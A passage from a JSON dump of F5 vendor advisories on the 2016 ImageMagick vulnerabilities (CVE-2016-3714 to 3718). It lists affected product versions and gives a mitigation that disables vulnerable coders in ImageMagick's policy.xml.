than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. 
Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" />\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "edition": 1, 
"modified": "2017-08-24T00:50:00", "published": "2016-05-14T02:43:00", "id": "F5:K29154575", "href": "https://support.f5.com/csp/article/K29154575", "title": "ImageMagick vulnerability CVE-2016-3717", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:43", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "edition": 1, "description": "\nF5 Product Development has assigned ID 591881 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H25102203 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None 
\nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coder listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "modified": "2017-08-24T00:40:00", "published": "2016-05-14T02:44:00", "id": "F5:K25102203", "href": "https://support.f5.com/csp/article/K25102203", "title": "ImageMagick vulnerability CVE-2016-3716", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:49", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "edition": 1, "description": "\nF5 Product Development has assigned ID 591894 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H10550253 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization 
\nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action**: Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. 
For example, since the vulnerable coder listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "modified": "2017-08-24T00:30:00", "published": "2016-05-14T02:44:00", "id": "F5:K10550253", "href": "https://support.f5.com/csp/article/K10550253", "title": "ImageMagick vulnerability CVE-2016-3715", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T02:18:16", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "edition": 1, "description": "\nF5 
Product Development has assigned ID 591806 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H592135 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| 
None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| ImageMagick \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ ADC| 4.5.0| None| Low| ImageMagick \nBIG-IQ Centralized Management| 5.0.0 \n4.6.0| None| Low| ImageMagick \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ImageMagick \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. 
Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP 
Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "modified": "2017-03-17T20:53:00", "published": "2016-05-10T09:23:00", "id": "F5:K03151140", "href": "https://support.f5.com/csp/article/K03151140", "title": "ImageMagick vulnerability CVE-2016-3714", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T21:07:47", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "\nF5 Product Development has assigned ID 591918 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H61974123 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | None | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 
13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "edition": 1, "modified": "2017-08-24T20:36:00", "published": "2016-05-14T02:43:00", "id": "F5:K61974123", "href": "https://support.f5.com/csp/article/K61974123", "title": "ImageMagick vulnerability CVE-2016-3718", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:24", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coder listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n</policymap>\n\n 5. 
